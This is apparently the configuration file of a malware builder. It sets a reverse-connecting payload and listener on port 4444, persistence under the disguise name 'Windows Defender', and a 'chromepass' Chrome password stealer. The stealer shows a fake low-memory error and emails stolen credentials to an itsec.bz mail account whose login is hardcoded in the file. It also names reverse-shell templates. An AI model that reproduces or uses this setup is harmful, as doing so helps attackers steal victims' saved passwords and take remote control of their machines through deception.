[DEFAULT]
Loaded = True
Fail=0

[LISTENER]
Port = 4444
CONNECTIONS_MAX=10

[MALWARE]
Filename=malware.py
Payload_name=genpayload
Host=127.0.0.1
Port=4444
Timeout=15
Stub=stub.py
Output=builds/malware
Startup_name=Windows Defender
Startup_icon=icons/icon2.ico
RECONNECT_MIN=10
RECONNECT_MAX=60

[STUB]
FUNC_LIST=["wrapper"]
TRY=3

[CHROMEPASS]
passfile=error.txt
errormsg=Virtual memory is too low to run this program. Try closing some programs.
Filename=chromepass
output=chromepass
icon=icons/icon2.ico
server=mail.itsec.bz
email=chromepass@itsec.bz
password=doNOTchange1

[TEMPLATES]
stub=templates/stub.mtemp
malware=templates/malware.mtemp
listener=templates/listener.mtemp
chromepass_email=templates/chromepass_email.mtemp
chromepass_revshell=templates/chromepass_revshell
error_OK=templates/errors/MB_OK.mtemp
